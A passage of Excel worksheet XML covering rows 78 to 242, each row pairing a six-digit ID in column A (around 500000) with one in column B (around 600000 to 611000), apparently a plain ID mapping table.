    <row r="78" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A78" s="3">
        <v>500022</v>
      </c>
      <c r="B78" s="3">
        <v>611079</v>
      </c>
    </row>
    <row r="79" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A79" s="3">
        <v>500022</v>
      </c>
      <c r="B79" s="3">
        <v>611080</v>
      </c>
    </row>
    <row r="80" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A80" s="3">
        <v>500022</v>
      </c>
      <c r="B80" s="3">
        <v>611081</v>
      </c>
    </row>
    <row r="81" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A81" s="3">
        <v>500022</v>
      </c>
      <c r="B81" s="3">
        <v>611082</v>
      </c>
    </row>
    <row r="82" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A82" s="3">
        <v>500022</v>
      </c>
      <c r="B82" s="3">
        <v>611083</v>
      </c>
    </row>
    <row r="83" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A83" s="3">
        <v>500022</v>
      </c>
      <c r="B83" s="3">
        <v>611084</v>
      </c>
    </row>
    <row r="84" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A84" s="3">
        <v>500022</v>
      </c>
      <c r="B84" s="3">
        <v>611085</v>
      </c>
    </row>
    <row r="85" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A85" s="3">
        <v>500013</v>
      </c>
      <c r="B85" s="3">
        <v>600084</v>
      </c>
    </row>
    <row r="86" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A86" s="3">
        <v>500013</v>
      </c>
      <c r="B86" s="3">
        <v>611087</v>
      </c>
    </row>
    <row r="87" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A87" s="3">
        <v>500050</v>
      </c>
      <c r="B87" s="3">
        <v>600295</v>
      </c>
    </row>
    <row r="88" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A88" s="3">
        <v>500050</v>
      </c>
      <c r="B88" s="3">
        <v>600296</v>
      </c>
    </row>
    <row r="89" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A89" s="3">
        <v>500050</v>
      </c>
      <c r="B89" s="3">
        <v>611090</v>
      </c>
    </row>
    <row r="90" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A90" s="3">
        <v>500050</v>
      </c>
      <c r="B90" s="3">
        <v>600297</v>
      </c>
    </row>
    <row r="91" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A91" s="3">
        <v>500050</v>
      </c>
      <c r="B91" s="3">
        <v>611092</v>
      </c>
    </row>
    <row r="92" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A92" s="3">
        <v>500050</v>
      </c>
      <c r="B92" s="3">
        <v>600285</v>
      </c>
    </row>
    <row r="93" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A93" s="3">
        <v>500050</v>
      </c>
      <c r="B93" s="3">
        <v>600299</v>
      </c>
    </row>
    <row r="94" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A94" s="3">
        <v>500050</v>
      </c>
      <c r="B94" s="3">
        <v>611096</v>
      </c>
    </row>
    <row r="95" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A95" s="3">
        <v>500050</v>
      </c>
      <c r="B95" s="3">
        <v>611097</v>
      </c>
    </row>
    <row r="96" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A96" s="3">
        <v>500050</v>
      </c>
      <c r="B96" s="3">
        <v>611098</v>
      </c>
    </row>
    <row r="97" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A97" s="3">
        <v>500050</v>
      </c>
      <c r="B97" s="3">
        <v>611099</v>
      </c>
    </row>
    <row r="98" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A98" s="3">
        <v>500050</v>
      </c>
      <c r="B98" s="3">
        <v>611100</v>
      </c>
    </row>
    <row r="99" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A99" s="3">
        <v>500050</v>
      </c>
      <c r="B99" s="3">
        <v>600300</v>
      </c>
    </row>
    <row r="100" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A100" s="3">
        <v>500050</v>
      </c>
      <c r="B100" s="3">
        <v>611102</v>
      </c>
    </row>
    <row r="101" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A101" s="3">
        <v>500064</v>
      </c>
      <c r="B101" s="3">
        <v>611103</v>
      </c>
    </row>
    <row r="102" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A102" s="3">
        <v>500064</v>
      </c>
      <c r="B102" s="3">
        <v>611104</v>
      </c>
    </row>
    <row r="103" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A103" s="3">
        <v>500064</v>
      </c>
      <c r="B103" s="3">
        <v>611105</v>
      </c>
    </row>
    <row r="104" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A104" s="3">
        <v>500064</v>
      </c>
      <c r="B104" s="3">
        <v>600066</v>
      </c>
    </row>
    <row r="105" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A105" s="3">
        <v>500064</v>
      </c>
      <c r="B105" s="3">
        <v>611107</v>
      </c>
    </row>
    <row r="106" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A106" s="3">
        <v>500067</v>
      </c>
      <c r="B106" s="3">
        <v>611108</v>
      </c>
    </row>
    <row r="107" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A107" s="3">
        <v>500067</v>
      </c>
      <c r="B107" s="3">
        <v>611109</v>
      </c>
    </row>
    <row r="108" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A108" s="3">
        <v>500067</v>
      </c>
      <c r="B108" s="3">
        <v>611110</v>
      </c>
    </row>
    <row r="109" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A109" s="3">
        <v>500067</v>
      </c>
      <c r="B109" s="3">
        <v>611111</v>
      </c>
    </row>
    <row r="110" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A110" s="3">
        <v>500067</v>
      </c>
      <c r="B110" s="3">
        <v>600144</v>
      </c>
    </row>
    <row r="111" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A111" s="3">
        <v>500067</v>
      </c>
      <c r="B111" s="3">
        <v>611113</v>
      </c>
    </row>
    <row r="112" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A112" s="3">
        <v>500067</v>
      </c>
      <c r="B112" s="3">
        <v>611114</v>
      </c>
    </row>
    <row r="113" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A113" s="3">
        <v>500067</v>
      </c>
      <c r="B113" s="3">
        <v>611115</v>
      </c>
    </row>
    <row r="114" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A114" s="3">
        <v>500067</v>
      </c>
      <c r="B114" s="3">
        <v>611116</v>
      </c>
    </row>
    <row r="115" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A115" s="3">
        <v>500082</v>
      </c>
      <c r="B115" s="3">
        <v>611117</v>
      </c>
    </row>
    <row r="116" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A116" s="3">
        <v>500082</v>
      </c>
      <c r="B116" s="3">
        <v>611118</v>
      </c>
    </row>
    <row r="117" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A117" s="3">
        <v>500082</v>
      </c>
      <c r="B117" s="3">
        <v>611119</v>
      </c>
    </row>
    <row r="118" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A118" s="3">
        <v>500082</v>
      </c>
      <c r="B118" s="3">
        <v>611120</v>
      </c>
    </row>
    <row r="119" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A119" s="3">
        <v>500082</v>
      </c>
      <c r="B119" s="3">
        <v>611121</v>
      </c>
    </row>
    <row r="120" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A120" s="3">
        <v>500082</v>
      </c>
      <c r="B120" s="3">
        <v>611122</v>
      </c>
    </row>
    <row r="121" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A121" s="3">
        <v>500082</v>
      </c>
      <c r="B121" s="3">
        <v>611123</v>
      </c>
    </row>
    <row r="122" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A122" s="3">
        <v>500082</v>
      </c>
      <c r="B122" s="3">
        <v>611124</v>
      </c>
    </row>
    <row r="123" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A123" s="3">
        <v>500087</v>
      </c>
      <c r="B123" s="3">
        <v>600052</v>
      </c>
    </row>
    <row r="124" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A124" s="3">
        <v>500087</v>
      </c>
      <c r="B124" s="3">
        <v>600168</v>
      </c>
    </row>
    <row r="125" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A125" s="3">
        <v>500087</v>
      </c>
      <c r="B125" s="3">
        <v>611127</v>
      </c>
    </row>
    <row r="126" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A126" s="3">
        <v>500087</v>
      </c>
      <c r="B126" s="3">
        <v>611128</v>
      </c>
    </row>
    <row r="127" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A127" s="3">
        <v>500087</v>
      </c>
      <c r="B127" s="3">
        <v>611129</v>
      </c>
    </row>
    <row r="128" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A128" s="3">
        <v>500087</v>
      </c>
      <c r="B128" s="3">
        <v>600081</v>
      </c>
    </row>
    <row r="129" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A129" s="3">
        <v>500087</v>
      </c>
      <c r="B129" s="3">
        <v>611131</v>
      </c>
    </row>
    <row r="130" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A130" s="3">
        <v>500087</v>
      </c>
      <c r="B130" s="3">
        <v>611132</v>
      </c>
    </row>
    <row r="131" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A131" s="3">
        <v>500087</v>
      </c>
      <c r="B131" s="3">
        <v>611133</v>
      </c>
    </row>
    <row r="132" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A132" s="3">
        <v>500087</v>
      </c>
      <c r="B132" s="3">
        <v>611134</v>
      </c>
    </row>
    <row r="133" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A133" s="3">
        <v>500087</v>
      </c>
      <c r="B133" s="3">
        <v>611135</v>
      </c>
    </row>
    <row r="134" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A134" s="3">
        <v>500087</v>
      </c>
      <c r="B134" s="3">
        <v>611136</v>
      </c>
    </row>
    <row r="135" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A135" s="3">
        <v>500096</v>
      </c>
      <c r="B135" s="3">
        <v>600053</v>
      </c>
    </row>
    <row r="136" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A136" s="3">
        <v>500096</v>
      </c>
      <c r="B136" s="3">
        <v>611138</v>
      </c>
    </row>
    <row r="137" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A137" s="3">
        <v>500096</v>
      </c>
      <c r="B137" s="3">
        <v>600081</v>
      </c>
    </row>
    <row r="138" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A138" s="3">
        <v>500096</v>
      </c>
      <c r="B138" s="3">
        <v>600121</v>
      </c>
    </row>
    <row r="139" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A139" s="3">
        <v>500096</v>
      </c>
      <c r="B139" s="3">
        <v>611141</v>
      </c>
    </row>
    <row r="140" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A140" s="3">
        <v>500096</v>
      </c>
      <c r="B140" s="3">
        <v>611142</v>
      </c>
    </row>
    <row r="141" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A141" s="3">
        <v>500096</v>
      </c>
      <c r="B141" s="3">
        <v>611143</v>
      </c>
    </row>
    <row r="142" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A142" s="3">
        <v>500001</v>
      </c>
      <c r="B142" s="3">
        <v>611144</v>
      </c>
    </row>
    <row r="143" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A143" s="3">
        <v>500001</v>
      </c>
      <c r="B143" s="3">
        <v>611145</v>
      </c>
    </row>
    <row r="144" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A144" s="3">
        <v>500001</v>
      </c>
      <c r="B144" s="3">
        <v>611146</v>
      </c>
    </row>
    <row r="145" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A145" s="3">
        <v>500001</v>
      </c>
      <c r="B145" s="3">
        <v>611147</v>
      </c>
    </row>
    <row r="146" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A146" s="3">
        <v>500001</v>
      </c>
      <c r="B146" s="3">
        <v>611148</v>
      </c>
    </row>
    <row r="147" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A147" s="3">
        <v>500001</v>
      </c>
      <c r="B147" s="3">
        <v>611149</v>
      </c>
    </row>
    <row r="148" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A148" s="3">
        <v>500135</v>
      </c>
      <c r="B148" s="3">
        <v>600249</v>
      </c>
    </row>
    <row r="149" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A149" s="3">
        <v>500063</v>
      </c>
      <c r="B149" s="3">
        <v>611151</v>
      </c>
    </row>
    <row r="150" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A150" s="3">
        <v>500063</v>
      </c>
      <c r="B150" s="3">
        <v>611152</v>
      </c>
    </row>
    <row r="151" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A151" s="3">
        <v>500063</v>
      </c>
      <c r="B151" s="3">
        <v>611153</v>
      </c>
    </row>
    <row r="152" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A152" s="3">
        <v>500098</v>
      </c>
      <c r="B152" s="3">
        <v>611154</v>
      </c>
    </row>
    <row r="153" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A153" s="3">
        <v>500098</v>
      </c>
      <c r="B153" s="3">
        <v>611155</v>
      </c>
    </row>
    <row r="154" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A154" s="3">
        <v>500098</v>
      </c>
      <c r="B154" s="3">
        <v>611156</v>
      </c>
    </row>
    <row r="155" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A155" s="3">
        <v>500098</v>
      </c>
      <c r="B155" s="3">
        <v>611157</v>
      </c>
    </row>
    <row r="156" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A156" s="3">
        <v>500108</v>
      </c>
      <c r="B156" s="3">
        <v>611158</v>
      </c>
    </row>
    <row r="157" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A157" s="3">
        <v>500060</v>
      </c>
      <c r="B157" s="3">
        <v>611160</v>
      </c>
    </row>
    <row r="158" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A158" s="3">
        <v>500060</v>
      </c>
      <c r="B158" s="3">
        <v>600059</v>
      </c>
    </row>
    <row r="159" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A159" s="3">
        <v>500060</v>
      </c>
      <c r="B159" s="3">
        <v>600002</v>
      </c>
    </row>
    <row r="160" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A160" s="3">
        <v>500060</v>
      </c>
      <c r="B160" s="3">
        <v>611163</v>
      </c>
    </row>
    <row r="161" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A161" s="3">
        <v>500060</v>
      </c>
      <c r="B161" s="3">
        <v>611164</v>
      </c>
    </row>
    <row r="162" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A162" s="3">
        <v>500008</v>
      </c>
      <c r="B162" s="3">
        <v>600176</v>
      </c>
    </row>
    <row r="163" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A163" s="3">
        <v>500008</v>
      </c>
      <c r="B163" s="3">
        <v>611166</v>
      </c>
    </row>
    <row r="164" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A164" s="3">
        <v>500008</v>
      </c>
      <c r="B164" s="3">
        <v>611167</v>
      </c>
    </row>
    <row r="165" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A165" s="3">
        <v>500008</v>
      </c>
      <c r="B165" s="3">
        <v>611168</v>
      </c>
    </row>
    <row r="166" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A166" s="3">
        <v>500008</v>
      </c>
      <c r="B166" s="3">
        <v>611169</v>
      </c>
    </row>
    <row r="167" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A167" s="3">
        <v>500008</v>
      </c>
      <c r="B167" s="3">
        <v>600178</v>
      </c>
    </row>
    <row r="168" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A168" s="3">
        <v>500008</v>
      </c>
      <c r="B168" s="3">
        <v>611171</v>
      </c>
    </row>
    <row r="169" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A169" s="3">
        <v>500008</v>
      </c>
      <c r="B169" s="3">
        <v>611172</v>
      </c>
    </row>
    <row r="170" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A170" s="3">
        <v>500114</v>
      </c>
      <c r="B170" s="3">
        <v>600140</v>
      </c>
    </row>
    <row r="171" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A171" s="3">
        <v>500114</v>
      </c>
      <c r="B171" s="3">
        <v>611174</v>
      </c>
    </row>
    <row r="172" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A172" s="3">
        <v>500003</v>
      </c>
      <c r="B172" s="3">
        <v>611175</v>
      </c>
    </row>
    <row r="173" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A173" s="3">
        <v>500003</v>
      </c>
      <c r="B173" s="3">
        <v>611176</v>
      </c>
    </row>
    <row r="174" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A174" s="3">
        <v>500080</v>
      </c>
      <c r="B174" s="3">
        <v>611177</v>
      </c>
    </row>
    <row r="175" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A175" s="3">
        <v>500080</v>
      </c>
      <c r="B175" s="3">
        <v>611178</v>
      </c>
    </row>
    <row r="176" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A176" s="3">
        <v>500080</v>
      </c>
      <c r="B176" s="3">
        <v>611179</v>
      </c>
    </row>
    <row r="177" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A177" s="3">
        <v>500080</v>
      </c>
      <c r="B177" s="3">
        <v>611180</v>
      </c>
    </row>
    <row r="178" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A178" s="3">
        <v>500080</v>
      </c>
      <c r="B178" s="3">
        <v>611181</v>
      </c>
    </row>
    <row r="179" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A179" s="3">
        <v>500080</v>
      </c>
      <c r="B179" s="3">
        <v>611182</v>
      </c>
    </row>
    <row r="180" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A180" s="3">
        <v>500080</v>
      </c>
      <c r="B180" s="3">
        <v>611183</v>
      </c>
    </row>
    <row r="181" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A181" s="3">
        <v>500080</v>
      </c>
      <c r="B181" s="3">
        <v>611184</v>
      </c>
    </row>
    <row r="182" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A182" s="3">
        <v>500080</v>
      </c>
      <c r="B182" s="3">
        <v>611185</v>
      </c>
    </row>
    <row r="183" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A183" s="3">
        <v>500080</v>
      </c>
      <c r="B183" s="3">
        <v>611186</v>
      </c>
    </row>
    <row r="184" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A184" s="3">
        <v>500080</v>
      </c>
      <c r="B184" s="3">
        <v>611187</v>
      </c>
    </row>
    <row r="185" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A185" s="3">
        <v>500080</v>
      </c>
      <c r="B185" s="3">
        <v>611188</v>
      </c>
    </row>
    <row r="186" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A186" s="3">
        <v>500080</v>
      </c>
      <c r="B186" s="3">
        <v>611189</v>
      </c>
    </row>
    <row r="187" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A187" s="3">
        <v>500080</v>
      </c>
      <c r="B187" s="3">
        <v>600081</v>
      </c>
    </row>
    <row r="188" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A188" s="3">
        <v>500052</v>
      </c>
      <c r="B188" s="3">
        <v>611191</v>
      </c>
    </row>
    <row r="189" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A189" s="3">
        <v>500052</v>
      </c>
      <c r="B189" s="3">
        <v>600191</v>
      </c>
    </row>
    <row r="190" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A190" s="3">
        <v>500052</v>
      </c>
      <c r="B190" s="3">
        <v>611193</v>
      </c>
    </row>
    <row r="191" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A191" s="3">
        <v>500052</v>
      </c>
      <c r="B191" s="3">
        <v>611194</v>
      </c>
    </row>
    <row r="192" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A192" s="3">
        <v>500132</v>
      </c>
      <c r="B192" s="3">
        <v>611195</v>
      </c>
    </row>
    <row r="193" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A193" s="3">
        <v>500070</v>
      </c>
      <c r="B193" s="3">
        <v>600097</v>
      </c>
    </row>
    <row r="194" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A194" s="3">
        <v>500070</v>
      </c>
      <c r="B194" s="3">
        <v>600098</v>
      </c>
    </row>
    <row r="195" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A195" s="3">
        <v>500012</v>
      </c>
      <c r="B195" s="3">
        <v>611198</v>
      </c>
    </row>
    <row r="196" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A196" s="3">
        <v>500012</v>
      </c>
      <c r="B196" s="3">
        <v>611199</v>
      </c>
    </row>
    <row r="197" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A197" s="3">
        <v>500012</v>
      </c>
      <c r="B197" s="3">
        <v>611200</v>
      </c>
    </row>
    <row r="198" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A198" s="3">
        <v>500012</v>
      </c>
      <c r="B198" s="3">
        <v>611201</v>
      </c>
    </row>
    <row r="199" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A199" s="3">
        <v>500012</v>
      </c>
      <c r="B199" s="3">
        <v>611202</v>
      </c>
    </row>
    <row r="200" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A200" s="3">
        <v>500012</v>
      </c>
      <c r="B200" s="3">
        <v>611203</v>
      </c>
    </row>
    <row r="201" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A201" s="3">
        <v>500012</v>
      </c>
      <c r="B201" s="3">
        <v>611204</v>
      </c>
    </row>
    <row r="202" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A202" s="3">
        <v>500079</v>
      </c>
      <c r="B202" s="3">
        <v>600287</v>
      </c>
    </row>
    <row r="203" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A203" s="3">
        <v>500079</v>
      </c>
      <c r="B203" s="3">
        <v>600288</v>
      </c>
    </row>
    <row r="204" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A204" s="3">
        <v>500079</v>
      </c>
      <c r="B204" s="3">
        <v>611207</v>
      </c>
    </row>
    <row r="205" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A205" s="3">
        <v>500079</v>
      </c>
      <c r="B205" s="3">
        <v>611208</v>
      </c>
    </row>
    <row r="206" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A206" s="3">
        <v>500105</v>
      </c>
      <c r="B206" s="3">
        <v>611209</v>
      </c>
    </row>
    <row r="207" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A207" s="3">
        <v>500009</v>
      </c>
      <c r="B207" s="3">
        <v>611210</v>
      </c>
    </row>
    <row r="208" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A208" s="3">
        <v>500009</v>
      </c>
      <c r="B208" s="3">
        <v>611211</v>
      </c>
    </row>
    <row r="209" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A209" s="3">
        <v>500009</v>
      </c>
      <c r="B209" s="3">
        <v>611212</v>
      </c>
    </row>
    <row r="210" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A210" s="3">
        <v>500009</v>
      </c>
      <c r="B210" s="3">
        <v>611213</v>
      </c>
    </row>
    <row r="211" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A211" s="3">
        <v>500009</v>
      </c>
      <c r="B211" s="3">
        <v>611214</v>
      </c>
    </row>
    <row r="212" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A212" s="3">
        <v>500009</v>
      </c>
      <c r="B212" s="3">
        <v>611215</v>
      </c>
    </row>
    <row r="213" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A213" s="3">
        <v>500009</v>
      </c>
      <c r="B213" s="3">
        <v>611216</v>
      </c>
    </row>
    <row r="214" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A214" s="3">
        <v>500035</v>
      </c>
      <c r="B214" s="3">
        <v>600084</v>
      </c>
    </row>
    <row r="215" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A215" s="3">
        <v>500035</v>
      </c>
      <c r="B215" s="3">
        <v>611218</v>
      </c>
    </row>
    <row r="216" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A216" s="3">
        <v>500035</v>
      </c>
      <c r="B216" s="3">
        <v>611219</v>
      </c>
    </row>
    <row r="217" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A217" s="3">
        <v>500035</v>
      </c>
      <c r="B217" s="3">
        <v>611220</v>
      </c>
    </row>
    <row r="218" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A218" s="3">
        <v>500035</v>
      </c>
      <c r="B218" s="3">
        <v>611221</v>
      </c>
    </row>
    <row r="219" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A219" s="3">
        <v>500035</v>
      </c>
      <c r="B219" s="3">
        <v>611222</v>
      </c>
    </row>
    <row r="220" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A220" s="3">
        <v>500035</v>
      </c>
      <c r="B220" s="3">
        <v>611223</v>
      </c>
    </row>
    <row r="221" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A221" s="3">
        <v>500074</v>
      </c>
      <c r="B221" s="3">
        <v>611224</v>
      </c>
    </row>
    <row r="222" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A222" s="3">
        <v>500074</v>
      </c>
      <c r="B222" s="3">
        <v>611225</v>
      </c>
    </row>
    <row r="223" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A223" s="3">
        <v>500074</v>
      </c>
      <c r="B223" s="3">
        <v>611226</v>
      </c>
    </row>
    <row r="224" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A224" s="3">
        <v>500074</v>
      </c>
      <c r="B224" s="3">
        <v>611227</v>
      </c>
    </row>
    <row r="225" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A225" s="3">
        <v>500074</v>
      </c>
      <c r="B225" s="3">
        <v>611228</v>
      </c>
    </row>
    <row r="226" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A226" s="3">
        <v>500074</v>
      </c>
      <c r="B226" s="3">
        <v>611229</v>
      </c>
    </row>
    <row r="227" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A227" s="3">
        <v>500074</v>
      </c>
      <c r="B227" s="3">
        <v>611230</v>
      </c>
    </row>
    <row r="228" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A228" s="3">
        <v>500074</v>
      </c>
      <c r="B228" s="3">
        <v>611231</v>
      </c>
    </row>
    <row r="229" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A229" s="3">
        <v>500074</v>
      </c>
      <c r="B229" s="3">
        <v>611232</v>
      </c>
    </row>
    <row r="230" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A230" s="3">
        <v>500074</v>
      </c>
      <c r="B230" s="3">
        <v>611233</v>
      </c>
    </row>
    <row r="231" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A231" s="3">
        <v>500017</v>
      </c>
      <c r="B231" s="3">
        <v>611234</v>
      </c>
    </row>
    <row r="232" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A232" s="3">
        <v>500017</v>
      </c>
      <c r="B232" s="3">
        <v>611235</v>
      </c>
    </row>
    <row r="233" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A233" s="3">
        <v>500031</v>
      </c>
      <c r="B233" s="3">
        <v>611236</v>
      </c>
    </row>
    <row r="234" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A234" s="3">
        <v>500066</v>
      </c>
      <c r="B234" s="3">
        <v>611237</v>
      </c>
    </row>
    <row r="235" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A235" s="3">
        <v>500066</v>
      </c>
      <c r="B235" s="3">
        <v>600159</v>
      </c>
    </row>
    <row r="236" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A236" s="3">
        <v>500066</v>
      </c>
      <c r="B236" s="3">
        <v>611239</v>
      </c>
    </row>
    <row r="237" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A237" s="3">
        <v>500066</v>
      </c>
      <c r="B237" s="3">
        <v>611240</v>
      </c>
    </row>
    <row r="238" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A238" s="3">
        <v>500020</v>
      </c>
      <c r="B238" s="3">
        <v>611241</v>
      </c>
    </row>
    <row r="239" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A239" s="3">
        <v>500020</v>
      </c>
      <c r="B239" s="3">
        <v>611242</v>
      </c>
    </row>
    <row r="240" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A240" s="3">
        <v>500120</v>
      </c>
      <c r="B240" s="3">
        <v>611243</v>
      </c>
    </row>
    <row r="241" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A241" s="3">
        <v>500120</v>
      </c>
      <c r="B241" s="3">
        <v>611244</v>
      </c>
    </row>
    <row r="242" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A242" s="3">
        <v>500137</v>
      </c>
      <c r="B242" s="3">
